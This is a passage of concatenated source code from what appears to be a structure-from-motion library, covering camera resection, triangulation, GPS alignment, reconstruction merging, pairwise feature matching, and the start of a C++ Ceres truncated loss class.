        print 'Number of inliers', len(inliers)
        reconstruction = {
            "cameras": cameras,
            "shots": {
                # im1 defines the world frame (identity pose).
                im1: {
                    "camera": str(d1['camera']),
                    "rotation": [0.0, 0.0, 0.0],
                    "translation": [0.0, 0.0, 0.0],
                },
                im2: {
                    "camera": str(d2['camera']),
                    "rotation": list(cv2.Rodrigues(R)[0].flat),
                    "translation": list(t),
                },
            },
            "points": {
            },
        }
        add_gps_position(data, reconstruction, im1)
        add_gps_position(data, reconstruction, im2)
        triangulate_shot_features(
            graph, reconstruction, im1,
            data.config.get('triangulation_threshold', 0.004),
            data.config.get('triangulation_min_ray_angle', 2.0))
        print 'Number of reconstructed 3D points :{}'.format(len(reconstruction['points']))
        if len(reconstruction['points']) > data.config.get('five_point_algo_min_inliers', 50):
            print 'Found initialize good pair', im1, 'and', im2
            return reconstruction

    print 'Pair', im1, ':', im2, 'fails'
    return None
def reconstructed_points_for_images(graph, reconstruction, images):
    """For each not-yet-reconstructed image, count its tracks that
    already have a 3D point; return (image, count) pairs sorted by
    decreasing count."""
    counts = []
    for image in images:
        if image in reconstruction['shots']:
            continue
        n = sum(1 for track in graph[image] if track in reconstruction['points'])
        counts.append((image, n))
    counts.sort(key=lambda item: -item[1])
    return counts
def rotate(angleaxis, point):
    """Rotate a 3D point by an angle-axis vector (Rodrigues form)."""
    rotation_matrix, _ = cv2.Rodrigues(np.array(angleaxis, dtype=float))
    return rotation_matrix.dot(np.array(point))
def camera_coordinates(camera, shot, point):
    """Transform a world point into the camera frame of a shot
    (rotate, then translate)."""
    return rotate(shot['rotation'], point) + shot['translation']
def back_project(camera, shot, pixel, depth):
    """Lift an image point at a given depth back to world coordinates.

    Solves K R X = depth * [u, v, 1] - K t for X.
    """
    K = multiview.K_from_camera(camera)
    R, _ = cv2.Rodrigues(np.array(shot['rotation'], dtype=float))
    rhs = depth * np.array([pixel[0], pixel[1], 1]) - K.dot(shot['translation'])
    return np.linalg.solve(K.dot(R), rhs)
def reproject(camera, shot, point):
    '''Project a reconstructed 3D point into normalized image
    coordinates, applying the camera's radial distortion (k1, k2).
    '''
    camera_point = rotate(shot['rotation'], point['coordinates'])
    camera_point += shot['translation']
    xp = camera_point[0] / camera_point[2]
    yp = camera_point[1] / camera_point[2]

    k1 = camera.get('k1', 0.0)
    k2 = camera.get('k2', 0.0)
    r2 = xp * xp + yp * yp
    radial = 1.0 + r2 * (k1 + k2 * r2)

    focal = camera['focal']
    return np.array([focal * radial * xp, focal * radial * yp])
def single_reprojection_error(camera, shot, point, observation):
    '''Euclidean distance between a point's reprojection and its
    observed image position.
    '''
    return np.linalg.norm(reproject(camera, shot, point) - observation)
def reprojection_error(graph, reconstruction):
    """Median reprojection error over every observation of every
    reconstructed track."""
    errors = []
    for shot_id in reconstruction['shots']:
        shot = reconstruction['shots'][shot_id]
        camera = reconstruction['cameras'][shot['camera']]
        for track_id in graph[shot_id]:
            if track_id not in reconstruction['points']:
                continue
            observation = graph[shot_id][track_id]['feature']
            point = reconstruction['points'][track_id]
            errors.append(single_reprojection_error(camera, shot, point, observation))
    return np.median(errors)
def reprojection_error_track(track, graph, reconstruction):
    """Worst reprojection error of a track over the reconstructed shots
    that observe it.

    Returns the sentinel 999999999. when the track is not reconstructed
    or has no observation in any reconstructed shot.
    """
    errors = []
    if track in reconstruction['points']:
        point = reconstruction['points'][track]
        for shot_id in graph[track]:
            if shot_id not in reconstruction['shots']:
                continue
            observation = graph[shot_id][track]['feature']
            shot = reconstruction['shots'][shot_id]
            camera = reconstruction['cameras'][shot['camera']]
            errors.append(single_reprojection_error(camera, shot, point, observation))
    return np.max(errors) if errors else 999999999.
def resect(data, graph, reconstruction, shot_id):
    '''Add a shot to the reconstruction.

    Gathers 2D-3D correspondences between the shot's observed tracks and
    already-reconstructed points, solves PnP with RANSAC, and registers
    the shot when enough inliers support the pose.  Returns True on
    success, False otherwise.
    '''
    xs = []
    Xs = []
    for track in graph[shot_id]:
        if track in reconstruction['points']:
            xs.append(graph[shot_id][track]['feature'])
            Xs.append(reconstruction['points'][track]['coordinates'])
    x = np.array(xs)
    X = np.array(Xs)
    if len(x) < 5:
        return False
    exif = data.load_exif(shot_id)
    camera_model = exif['camera']
    K = multiview.K_from_camera(reconstruction['cameras'][camera_model])
    # Zero distortion: features are in normalized coordinates already.
    dist = np.array([0,0,0,0.])

    # Prior on focal length
    # NOTE(review): the 3-value unpacking matches OpenCV 2.4's
    # solvePnPRansac; OpenCV 3+ returns (retval, rvec, tvec, inliers) --
    # confirm the targeted OpenCV version.
    R, t, inliers = cv2.solvePnPRansac(X.astype(np.float32), x.astype(np.float32), K, dist,
                                       reprojectionError=data.config.get('resection_threshold', 0.004))
    if inliers is None:
        print 'Resection', shot_id, 'no inliers'
        return False
    print 'Resection', shot_id, 'inliers:', len(inliers), '/', len(x)
    if len(inliers) >= data.config.get('resection_min_inliers', 15):
        reconstruction['shots'][shot_id] = {
            "camera": camera_model,
            "rotation": list(R.flat),
            "translation": list(t.flat),
        }
        add_gps_position(data, reconstruction, shot_id)
        return True
    else:
        return False
def Rt_from_shot(shot):
    """Build the 3x4 [R|t] pose matrix from a shot's angle-axis rotation
    and translation."""
    rotation, _ = cv2.Rodrigues(np.array(shot['rotation'], dtype=float))
    translation = np.array(shot['translation'], dtype=float).reshape(3, 1)
    return np.hstack((rotation, translation))
def projection_matrix(camera, shot):
    """Compose the full 3x4 projection matrix P = K [R|t] for a shot."""
    return multiview.K_from_camera(camera).dot(Rt_from_shot(shot))
def angle_between_rays(KR11, x1, KR12, x2):
    """Angle between the viewing rays of one correspondence.

    KR11 / KR12 are the (K R)^-1 matrices of each shot; applying them to
    homogeneous image points yields ray directions.
    """
    ray1 = KR11.dot([x1[0], x1[1], 1])
    ray2 = KR12.dot([x2[0], x2[1], 1])
    return multiview.vector_angle(ray1, ray2)
def triangulate_track(track, graph, reconstruction, P_by_id, KR1_by_id, Kinv_by_id, reproj_threshold, min_ray_angle=2.0):
    ''' Triangulate a track.

    Collects the projection matrices of all reconstructed shots that
    observe the track, requires the maximum pairwise ray angle to exceed
    min_ray_angle, and triangulates via DLT.  The point is stored only
    if it lies in front of the cameras and every reprojection error is
    below reproj_threshold.  The *_by_id dicts are caches shared across
    calls for the same reconstruction.
    '''
    Ps, Ps_initial, KR1_initial, Kinv_initial = [], [], [], []
    xs, xs_initial = [], []

    for shot in graph[track]:
        if shot in reconstruction['shots']:
            if shot not in P_by_id:
                s = reconstruction['shots'][shot]
                c = reconstruction['cameras'][s['camera']]
                P = projection_matrix(c, s)
                P_by_id[shot] = P
                KR1_by_id[shot] = np.linalg.inv(P[:, :3])
                Kinv_by_id[shot] = np.linalg.inv(multiview.K_from_camera(c))
            Ps_initial.append(P_by_id[shot])
            xs_initial.append(graph[track][shot]['feature'])
            KR1_initial.append(KR1_by_id[shot])
            Kinv_initial.append(Kinv_by_id[shot])

    valid_set = []
    if len(Ps_initial) >= 2:
        max_angle = 0
        for i, j in combinations(range(len(Ps_initial)), 2):
            angle = angle_between_rays(
                KR1_initial[i], xs_initial[i], KR1_initial[j], xs_initial[j])
            # NOTE(review): 'if 1' accepts every view regardless of its
            # pairwise angle -- a per-pair angle filter appears disabled
            # here; confirm intent.
            if 1:
                if i not in valid_set:
                    valid_set.append(i)
                if j not in valid_set:
                    valid_set.append(j)
                max_angle = max(angle, max_angle)
        if max_angle > np.radians(min_ray_angle):
            # Normalize to K^-1 P and K^-1 x before DLT triangulation.
            for k in valid_set:
                Ps.append(np.dot(Kinv_initial[k], Ps_initial[k]))
                xx = np.dot(Kinv_initial[k][:2, :], multiview.homogeneous(np.array(xs_initial[k])))
                xs.append(xx[0:2])
            X = multiview.triangulate(Ps, xs)
            error = 0
            Xh = multiview.homogeneous(X)
            for P, x in zip(Ps, xs):
                xx, yy, zz = P.dot(Xh)
                if zz <= 0:
                    # Point behind a camera: force rejection.
                    error = 999999999.0
                reprojected_x = np.array([xx / zz, yy / zz])
                # NOTE(review): uses the signed .max() rather than an
                # absolute error -- large negative residuals would pass;
                # confirm intended.
                error = max(error, (reprojected_x - x).max())
            if error < reproj_threshold:
                reconstruction['points'][track] = {
                    "coordinates": list(X),
                }
def triangulate_shot_features(graph, reconstruction, shot_id, reproj_threshold, min_ray_angle):
    '''Reconstruct as many tracks seen in shot_id as possible.

    Fresh per-call caches are shared by the individual triangulations.
    '''
    P_cache, KR1_cache, Kinv_cache = {}, {}, {}
    for track in graph[shot_id]:
        if track in reconstruction['points']:
            continue
        triangulate_track(track, graph, reconstruction,
                          P_cache, KR1_cache, Kinv_cache,
                          reproj_threshold, min_ray_angle)
def retriangulate(graph, reconstruction, image_graph, config):
    '''Re-triangulate 3D points.

    For reconstructed image pairs where less than 30% of the common
    tracks already have a 3D point, try to triangulate the missing
    tracks, bundle adjust, drop the new points whose reprojection error
    exceeds the threshold, and bundle adjust again.
    '''
    P_by_id = {}
    KR1_by_id = {}
    Kinv_by_id = {}
    shots = reconstruction['shots']
    points = reconstruction['points']
    points_added = 0
    tracks_added = []
    points_before = len(points)
    for im1, im2, d in image_graph.edges(data=True):
        if (im1 in shots) and (im2 in shots):
            tracks, p1, p2 = dataset.common_tracks(graph, im1, im2)
            # find already reconstructed tracks
            diff = np.setdiff1d(tracks, points.keys())
            reconstruct_ratio = 1 - len(diff) / float(len(tracks))
            if reconstruct_ratio < 0.3:
                for track in diff:
                    if track not in tracks_added:
                        # NOTE(review): threshold hard-coded to 0.006 here
                        # instead of the config value -- confirm intended.
                        triangulate_track(track, graph, reconstruction, P_by_id, KR1_by_id, Kinv_by_id, reproj_threshold=0.006)
                        points_added += 1
                        tracks_added.append(track)

    # bundle adjustment
    bundle(graph, reconstruction, config)

    # filter points with large reprojection errors
    track_to_delete = []
    for track in tracks_added:
        error = reprojection_error_track(track, graph, reconstruction)
        if error > config.get('triangulation_threshold', 0.004):
            track_to_delete.append(track)
    print 'Add {0} points after retriangulation.'.format(len(reconstruction['points']) - points_before)
    for t in track_to_delete:
        if t in reconstruction['points']:
            del reconstruction['points'][t]

    # bundle adjustment
    bundle(graph, reconstruction, config)
def retriangulate_all(graph, reconstruction, image_graph, config):
    '''
    Retriangulate every track in the graph, then bundle adjust.
    '''
    threshold = config.get('retriangulation_threshold', 0.004)
    min_ray_angle = config.get('triangulation_min_ray_angle', 2.0)
    P_cache, KR1_cache, Kinv_cache = {}, {}, {}
    all_tracks, _ = tracks_and_images(graph)
    for track in all_tracks:
        triangulate_track(track, graph, reconstruction,
                          P_cache, KR1_cache, Kinv_cache,
                          threshold, min_ray_angle)
    # Refine everything after the fresh triangulations.
    bundle(graph, reconstruction, config)
def optical_center(shot):
    """Camera center in world coordinates: C = -R^T t."""
    R, _ = cv2.Rodrigues(np.array(shot['rotation'], dtype=float))
    return -R.T.dot(shot['translation'])
def viewing_direction(shot):
    """ Calculates the viewing direction for a shot.

    Rotates the camera-frame forward axis (0, 0, 1) into the world frame.

    :param shot: The shot.
    :return: The viewing direction.
    """
    R, _ = cv2.Rodrigues(np.array(shot['rotation'], dtype=float))
    forward = np.array([0, 0, 1])
    return R.T.dot(forward)
def apply_similarity(reconstruction, s, A, b):
    """Apply a similarity (y = s A x + b) to a reconstruction in place.

    :param reconstruction: The reconstruction to transform.
    :param s: The scale (a scalar)
    :param A: The rotation matrix (3x3)
    :param b: The translation vector (3)
    """
    # Transform every 3D point.
    for point in reconstruction['points'].values():
        moved = s * A.dot(point['coordinates']) + b
        point['coordinates'] = list(moved)

    # Update every camera pose so the projections of the transformed
    # points are unchanged.
    for shot in reconstruction['shots'].values():
        R = cv2.Rodrigues(np.array(shot['rotation']))[0]
        t = np.array(shot['translation'])
        R_new = R.dot(A.T)
        t_new = s * t - R_new.dot(b)
        shot['rotation'] = list(cv2.Rodrigues(R_new)[0].flat)
        shot['translation'] = list(t_new)
def align_reconstruction_naive(reconstruction):
    """Rigidly align a reconstruction to its GPS positions.

    Fits a similarity Xp = s A X + b between camera optical centers and
    their GPS priors and applies it.  Requires at least 3 shots.
    """
    if len(reconstruction['shots']) < 3:
        return
    centers, gps_positions = [], []
    for shot in reconstruction['shots'].values():
        centers.append(optical_center(shot))
        gps_positions.append(shot['gps_position'])
    centers = np.array(centers)
    gps_positions = np.array(gps_positions)

    # Compute similarity Xp = s A X + b
    T = tf.superimposition_matrix(centers.T, gps_positions.T, scale=True)
    A, b = T[:3, :3], T[:3, 3]
    # Factor the uniform scale out of the rotation part.
    s = np.linalg.det(A) ** (1. / 3)
    A /= s
    apply_similarity(reconstruction, s, A, b)
def get_horitzontal_and_vertical_directions(R, orientation):
    '''Get orientation vectors from camera rotation matrix and orientation tag.

    Return a 3D vectors pointing to the positive XYZ directions of the image.
    X points to the right, Y to the bottom, Z to the front.
    '''
    # See http://sylvana.net/jpegcrop/exif_orientation.html
    # Each EXIF tag value selects/negates rows of R to undo the stored
    # image orientation.
    if orientation == 1:
        return R[0, :], R[1, :], R[2, :]
    if orientation == 2:
        return -R[0, :], R[1, :], -R[2, :]
    if orientation == 3:
        return -R[0, :], -R[1, :], R[2, :]
    if orientation == 4:
        return R[0, :], -R[1, :], R[2, :]
    if orientation == 5:
        return R[1, :], R[0, :], -R[2, :]
    if orientation == 6:
        return R[1, :], -R[0, :], R[2, :]
    if orientation == 7:
        return -R[1, :], -R[0, :], -R[2, :]
    if orientation == 8:
        return -R[1, :], R[0, :], R[2, :]
    # Unknown tag: prints an error and implicitly returns None.
    print 'ERROR unknown orientation', orientation
def align_reconstruction(reconstruction, config):
    """Dispatch to the configured alignment strategy.

    'orientation_prior' (default) levels the scene using EXIF
    orientation cues; 'naive' fits a 3D similarity to GPS directly.
    """
    method = config.get('align_method', 'orientation_prior')
    if method == 'orientation_prior':
        return align_reconstruction_orientation_prior(reconstruction, config)
    if method == 'naive':
        return align_reconstruction_naive(reconstruction)
def align_reconstruction_orientation_prior(reconstruction, config):
    """Align a reconstruction to GPS using EXIF orientation priors.

    First estimates and levels the ground plane from per-shot horizontal
    and vertical direction cues, then fits a 2D similarity between the
    leveled camera centers and the GPS positions.
    """
    X, Xp = [], []
    orientation_type = config.get('align_orientation_prior', 'horizontal')
    onplane, verticals = [], []
    for shot in reconstruction['shots'].values():
        X.append(optical_center(shot))
        Xp.append(shot['gps_position'])
        R = cv2.Rodrigues(np.array(shot['rotation']))[0]
        x, y, z = get_horitzontal_and_vertical_directions(R, shot['exif_orientation'])
        # Which image axes constrain the plane depends on how the
        # cameras were held.
        if orientation_type == 'no_roll':
            onplane.append(x)
            verticals.append(-y)
        elif orientation_type == 'horizontal':
            onplane.append(x)
            onplane.append(z)
            verticals.append(-y)
        elif orientation_type == 'vertical':
            onplane.append(x)
            onplane.append(y)
            verticals.append(-z)

    X = np.array(X)
    Xp = np.array(Xp)

    # Estimate ground plane.
    p = multiview.fit_plane(X - X.mean(axis=0), onplane, verticals)
    Rplane = multiview.plane_horizontalling_rotation(p)
    X = Rplane.dot(X.T).T

    # Estimate 2d similarity to align to GPS
    if (len(X) < 2 or
            X.std(axis=0).max() < 1e-8 or  # All points are the same.
            Xp.std(axis=0).max() < 0.01):  # All GPS points are the same.
        # Degenerate case: only translate (and pick an arbitrary scale).
        s = len(X) / max(1e-8, X.std(axis=0).max())  # Set the arbitrary scale proportional to the number of cameras.
        A = Rplane
        b = Xp.mean(axis=0) - X.mean(axis=0)
    else:
        T = tf.affine_matrix_from_points(X.T[:2], Xp.T[:2], shear=False)
        s = np.linalg.det(T[:2, :2]) ** (1. / 2)
        A = np.eye(3)
        A[:2, :2] = T[:2, :2] / s
        A = A.dot(Rplane)
        b = np.array([T[0, 2],
                      T[1, 2],
                      Xp[:, 2].mean() - s * X[:, 2].mean()])  # vertical alignment
    apply_similarity(reconstruction, s, A, b)
def register_reconstruction_with_gps(reconstruction, reference):
    """
    register reconstrution with gps positions and compass angles

    Converts each shot's optical center back to lat/lon/alt relative to
    the topocentric reference and derives a compass direction, storing
    both under shot['gps'].
    """
    shots = reconstruction['shots']
    for shot_id, shot in shots.iteritems():  # Python 2 dict iteration
        gps = {}  # NOTE(review): unused local
        topo = optical_center(shot)
        lat, lon, alt = geo.lla_from_topocentric(topo[0], topo[1], topo[2],
                                                 reference['latitude'], reference['longitude'], reference['altitude'])
        # find direction
        # NOTE(review): this permanently shifts the shot's translation to
        # probe the viewing direction -- confirm the offset is meant to
        # persist after this call.
        shot['translation'][2] -= 1
        topo2 = optical_center(shot)
        dz = topo2 - topo
        # Compass bearing in degrees from the horizontal displacement.
        angle = np.rad2deg(np.arctan2(dz[0], dz[1]))
        reconstruction['shots'][shot_id]['gps'] = {
            'lon': lon,
            'lat': lat,
            'altitude': alt,
            'direction': angle
        }
def merge_two_reconstructions(r1, r2, config, threshold=1):
    ''' Merge two reconstructions with common tracks.

    Estimates a robust similarity transform between the two copies of
    the shared 3D points; when enough inliers support it, r1 is mapped
    into r2's frame and the union is re-aligned.  Returns [merged] on
    success, otherwise [r1, r2] unchanged.
    '''
    t1, t2 = r1['points'], r2['points']
    common_tracks = list(set(t1) & set(t2))
    # print 'Number of common tracks between two reconstructions: {0}'.format(len(common_tracks))
    if len(common_tracks) > 6:
        # Estimate similarity transform
        p1 = np.array([t1[t]['coordinates'] for t in common_tracks])
        p2 = np.array([t2[t]['coordinates'] for t in common_tracks])
        T, inliers = multiview.fit_similarity_transform(p1, p2, max_iterations=1000, threshold=threshold)
        if len(inliers) >= 10:
            s, A, b = multiview.decompose_similarity_transform(T)
            # Note: r1/r2 are mutated in place, not copied.
            r1p = r1
            apply_similarity(r1p, s, A, b)
            r = r2
            r['shots'].update(r1p['shots'])
            r['points'].update(r1p['points'])
            align_reconstruction(r, config)
            return [r]
        else:
            return [r1, r2]
    else:
        return [r1, r2]
def merge_reconstructions(reconstructions, config):
''' Greedily merge reconstructions with common tracks
'''
num_reconstruction = len(reconstructions)
ids_reconstructions = np.arange(num_reconstruction)
remaining_reconstruction = ids_reconstructions
reconstructions_merged = []
num_merge = 0
pairs = []
for (i, j) in combinations(ids_reconstructions, 2):
if (i in remaining_reconstruction) and (j in remaining_reconstruction):
r = merge_two_reconstructions(reconstructions[i], reconstructions[j], config)
if len(r) == 1:
remaining_reconstruction = list(set(remaining_reconstruction) - set([i, j]))
for k in remaining_reconstruction:
rr = merge_two_reconstructions(r[0], reconstructions[k], config)
if len(r) == 2:
break
else:
r = rr
remaining_reconstruction = list(set(remaining_reconstruction) - set([k]))
reconstructions_merged.append(r[0])
num_merge += 1
for k in remaining_reconstruction:
reconstructions_merged.append(reconstructions[k])
print 'Merged {0} reconstructions.'.format(num_merge)
return reconstructions_merged
def paint_reconstruction(data, graph, reconstruction):
    """Color every reconstructed point with the average image color of
    its observations."""
    # Group observations by shot so each image is decoded only once.
    to_paint = defaultdict(list)
    to_paint_track = defaultdict(list)
    for track in reconstruction['points']:
        for shot in graph[track]:
            to_paint[shot].append(graph[track][shot]['feature'])
            to_paint_track[shot].append(track)

    track_colors = {track: np.zeros(3) for track in reconstruction['points']}
    track_sum = {track: 0 for track in reconstruction['points']}

    for shot in to_paint:
        points = np.array(to_paint[shot])
        tracks = to_paint_track[shot]
        im = data.image_as_array(shot)
        # Convert normalized feature coordinates to pixel indices.
        pixels = features.denormalized_image_coordinates(points, im.shape[1], im.shape[0]).astype(int)
        colors = im[pixels[:, 1], pixels[:, 0]]
        for track, color in zip(tracks, colors):
            track_colors[track] += color
            track_sum[track] += 1

    # Average the accumulated colors per track.
    for track in reconstruction['points']:
        c = track_colors[track] / track_sum[track]
        reconstruction['points'][track]['color'] = list(c)
def paint_reconstruction_constant(data, graph, reconstruction):
    """Assign a constant lilac color to every reconstructed point."""
    for point in reconstruction['points'].values():
        point['color'] = [200, 180, 255]
def grow_reconstruction(data, graph, reconstruction, images, image_graph):
    """Iteratively add remaining images to a seeded reconstruction.

    Repeatedly resects the candidate image sharing the most already
    reconstructed tracks, triangulates its features, bundle adjusts and
    aligns, optionally retriangulating and pruning outlier points along
    the way.  Successfully added images are removed from `images`;
    the (mutated) reconstruction is returned.
    """
    bundle_interval = data.config.get('bundle_interval', 1)
    retriangulation = data.config.get('retriangulation', False)
    retriangulation_ratio = data.config.get('retriangulation_ratio', 1.25)
    bundle(graph, reconstruction, data.config)
    align_reconstruction(reconstruction, data.config)

    prev_num_points = len(reconstruction['points'])
    num_shots_reconstructed = len(reconstruction['shots'])

    while True:
        if data.config.get('save_partial_reconstructions', False):
            paint_reconstruction_constant(data, graph, reconstruction)
            data.save_reconstruction(reconstruction, 'reconstruction.{}.json'.format(
                datetime.datetime.now().isoformat().replace(':', '_')))

        # Candidates ordered by number of already-reconstructed tracks.
        common_tracks = reconstructed_points_for_images(graph, reconstruction, images)
        if not common_tracks:
            break

        for image, num_tracks in common_tracks:
            if resect(data, graph, reconstruction, image):
                print '-------------------------------------------------------'
                print 'Adding {0} to the reconstruction'.format(image)
                images.remove(image)

                if len(reconstruction['shots']) % bundle_interval == 0:
                    bundle(graph, reconstruction, data.config)

                triangulate_shot_features(
                    graph, reconstruction, image,
                    data.config.get('triangulation_threshold', 0.004),
                    data.config.get('triangulation_min_ray_angle', 2.0))

                if len(reconstruction['shots']) % bundle_interval == 0:
                    bundle(graph, reconstruction, data.config)

                align_reconstruction(reconstruction, data.config)

                # Retriangulate everything once enough new points appeared.
                num_points = len(reconstruction['points'])
                if retriangulation and num_points > prev_num_points * retriangulation_ratio:
                    print 'Re-triangulating'
                    retriangulate_all(graph, reconstruction, image_graph, data.config)
                    prev_num_points = len(reconstruction['points'])
                    print ' Reprojection Error:', reprojection_error(graph, reconstruction)

                # Prune tracks whose worst reprojection error is too large.
                if data.config.get('bundle_outlier_threshold', 0.008) > 0:
                    track_outlier = []
                    for track in reconstruction['points']:
                        error = reprojection_error_track(track, graph, reconstruction)
                        if error > data.config.get('bundle_outlier_threshold', 0.008):
                            track_outlier.append(track)
                    for track in track_outlier:
                        del reconstruction['points'][track]
                    print 'Remove {0} outliers'.format(len(track_outlier))

                # Restart candidate selection after every successful resect.
                break
        else:
            # for-else: no candidate could be resected.
            print 'Some images can not be added'
            break

    align_reconstruction(reconstruction, data.config)
    print 'Reprojection Error:', reprojection_error(graph, reconstruction)
    print 'Painting the reconstruction from {0} cameras'.format(len(reconstruction['shots']))
    paint_reconstruction(data, graph, reconstruction)
    print 'Done.'
    return reconstruction
def nonfisheye_cameras(data, images):
    """Filter out images taken with known fisheye cameras or carrying an
    invalid EXIF orientation tag (valid range is 1..8)."""
    fisheye_models = (
        "gopro hero3+ black edition",
        "gopro hero2",
    )
    kept = []
    for image in images:
        exif = data.load_exif(image)
        if exif['camera'] in fisheye_models:
            continue
        if not (1 <= exif['orientation'] <= 8):
            continue
        kept.append(image)
    return kept
def tracks_and_images(graph):
    """Split the nodes of a bipartite tracks graph into (tracks, images).

    Nodes whose 'bipartite' attribute equals 0 are images; all other
    nodes are tracks.
    """
    tracks, images = [], []
    for node, attrs in graph.nodes(data=True):
        (images if attrs['bipartite'] == 0 else tracks).append(node)
    return tracks, images
def incremental_reconstruction(data):
    """Top-level incremental SfM driver.

    Computes candidate seed pairs, bootstraps a reconstruction from the
    best available pair, grows it with the remaining images, and repeats
    until no pair is left; partial reconstructions are saved sorted by
    number of shots.
    """
    data.invent_reference_lla()
    graph = data.load_tracks_graph()
    tracks, images = tracks_and_images(graph)
    remaining_images = set(nonfisheye_cameras(data, images))
    print 'images', len(images)
    print 'nonfisheye images', len(remaining_images)
    # Image-to-image graph weighted by shared tracks.
    image_graph = bipartite.weighted_projected_graph(graph, images)
    reconstructions = []
    pairs = compute_image_pairs(graph, image_graph, data.config)
    for im1, im2 in pairs:
        if im1 in remaining_images and im2 in remaining_images:
            reconstruction = bootstrap_reconstruction(data, graph, im1, im2)
            if reconstruction:
                remaining_images.remove(im1)
                remaining_images.remove(im2)
                reconstruction = grow_reconstruction(data, graph, reconstruction, remaining_images, image_graph)
                reconstructions.append(reconstruction)
                # Persist after every grown reconstruction, largest first.
                reconstructions = sorted(reconstructions, key=lambda x: -len(x['shots']))
                data.save_reconstruction(reconstructions)

    for k, r in enumerate(reconstructions):
        print 'Reconstruction', k, ':', len(r['shots']), 'images', ',', len(r['points']), 'points'

    print len(reconstructions), 'partial reconstructions in total.'
<file_sep>#!/usr/bin/env python
import os.path, sys
import time
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
from multiprocessing import Pool
import numpy as np
import cv2
from itertools import combinations
import argparse
from opensfm import dataset
from opensfm import features
from opensfm import matching
from opensfm import geo
def match(imagepair):
    """Match features between one image pair and save robust matches.

    Relies on module-level globals assigned in __main__: `data`,
    `exifs`, and the preemptive features `f_pre`.  The pair is discarded
    early when the GPS distance is too large or preemptive matching
    finds too few correspondences; otherwise symmetric matching followed
    by robust (geometric) filtering is performed and the result saved.
    """
    im1, im2, i, n = imagepair
    print 'Matching', data.feature_type().upper(), 'for image', im1, 'with image', im2, ' - ', i, '/', n, ' - ', 100 * i / n, '%'
    matching_gps_distance = data.config.get('matching_gps_distance', 9999999)
    robust_matching_min_match = data.config.get('robust_matching_min_match', 20)
    preemptive_threshold = data.config.get('preemptive_threshold', 1)

    # gps distance
    distance = 0
    if im1 in exifs and im2 in exifs:
        gps1 = exifs[im1].get('gps', {})
        gps2 = exifs[im2].get('gps', {})
        if gps1 and gps2:
            lon1, lat1 = gps1['longitude'], gps1['latitude']
            lon2, lat2 = gps2['longitude'], gps2['latitude']
            distance = geo.gps_distance([lon1, lat1], [lon2, lat2])
    if distance > matching_gps_distance:
        print "Discarding based on GPS distance {0} > {1}".format(distance, matching_gps_distance)
        return

    # preemptive matching: cheap check on a truncated feature subset,
    # with a temporarily swapped-in Lowe's ratio.
    t = time.time()
    lowes_ratio = data.config.get('lowes_ratio', 0.6)
    data.config['lowes_ratio'] = data.config.get('preemptive_lowes_ratio', 0.6)
    matches_pre = matching.match_lowe_bf(f_pre[im1], f_pre[im2], data.config)
    data.config['lowes_ratio'] = lowes_ratio
    print "Preemptive matching {0}, time: {1}s".format(len(matches_pre), time.time() - t)
    if len(matches_pre) < preemptive_threshold:
        print "Discarding based of preemptive matches {0} < {1}".format(len(matches_pre), preemptive_threshold)
        return

    # symmetric matching over the full feature sets
    t = time.time()
    p1, f1 = data.load_features(im1)
    i1 = data.load_feature_index(im1, f1)

    p2, f2 = data.load_features(im2)
    i2 = data.load_feature_index(im2, f2)

    matches = matching.match_symmetric(f1, i1, f2, i2, data.config)
    if len(matches) < robust_matching_min_match:
        return
    print 'Full feature matching time of {0} - {2} : {1}s'.format(len(f1), time.time() - t, len(f2))

    # robust matching (geometric verification)
    t_robust_matching = time.time()
    rmatches = matching.robust_match(p1, p2, matches, data.config)
    if len(rmatches) < robust_matching_min_match:
        return
    print 'Robust matching time : {0}s'.format(time.time() - t_robust_matching)
    data.save_matches(im1, im2, rmatches)
    print "Full matching {0} / {1}, time: {2}s".format(len(rmatches), len(matches), time.time() - t)
def image_pairs(images):
    """Yield every unordered image pair together with progress information.

    For each 2-combination (a, b) of ``images`` yields ``(a, b, i, n)``
    where ``i`` is the running pair index and ``n`` is the total number of
    pairs, len * (len - 1) / 2.
    """
    count = len(images)
    total = count * (count - 1) / 2
    pair_index = 0
    for a, b in combinations(images, 2):
        yield a, b, pair_index, total
        pair_index += 1
# Entry point: pre-load EXIF and preemptive features for every image, then
# match all image pairs with a worker pool. (Python 2 script: print statement.)
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Match features between all image pairs.')
    parser.add_argument('dataset', help='path to the dataset to be processed')
    args = parser.parse_args()
    data = dataset.DataSet(args.dataset)
    images = data.images()
    matcher_type = data.matcher_type()
    print 'Loading preemptive data'
    exifs = {}
    p_pre, f_pre = {}, {}
    for image in images:
        # Progress dots, one per image.
        sys.stdout.write('.')
        sys.stdout.flush()
        # NOTE(review): 'load_preemtive_features' looks misspelled, but it must
        # match the DataSet API name -- confirm before renaming anywhere.
        p_pre[image], f_pre[image] = data.load_preemtive_features(image)
        # Cap the preemptive feature count at the configured maximum.
        preemptive_max = min(data.config.get('preemptive_max', p_pre[image].shape[0]), p_pre[image].shape[0])
        p_pre[image] = p_pre[image][:preemptive_max,:]
        f_pre[image] = f_pre[image][:preemptive_max,:]
        exifs[image] = data.load_exif(image)
    # Match all pairs in parallel and record the wall time in the profile log.
    start = time.time()
    p = Pool(data.config.get('processes',1))
    p.map(match, image_pairs(images))
    end = time.time()
    with open(data.profile_log(), 'a') as fout:
        fout.write('match_features: {0}\n'.format(end - start))
<file_sep>#include <cmath>
#include <cstdio>
#include <fstream>
#include <iostream>
#include <limits>
#include <map>
#include <string>
#include <vector>
extern "C" {
#include <string.h>
}
#include "ceres/ceres.h"
#include "ceres/rotation.h"
#include "ceres/loss_function.h"
// Truncated least-squares loss for Ceres:
//   rho(s) = s    for s <  t^2  (inlier: behaves like plain squared loss)
//   rho(s) = t^2  for s >= t^2  (outlier: cost is capped)
class TruncatedLoss : public ceres::LossFunction {
 public:
  // t is the inlier threshold on the residual norm; must be positive.
  explicit TruncatedLoss(double t)
    : t2_(t*t) {
    CHECK_GT(t, 0.0);
  }

  virtual void Evaluate(double s, double rho[3]) const {
    if (s >= t2_) {
      // Outlier.
      rho[0] = t2_;
      // Smallest positive double instead of an exact 0 derivative --
      // presumably to keep Ceres' internal rescaling well defined for a
      // flat loss; confirm against the Ceres LossFunction contract before
      // changing.
      rho[1] = std::numeric_limits<double>::min();
      rho[2] = 0.0;
    } else {
      // Inlier.
      rho[0] = s;
      rho[1] = 1.0;
      rho[2] = 0.0;
    }
  }

 private:
  const double t2_;  // Squared threshold.
};
// Pinhole reprojection residual for use with Ceres autodiff.
//
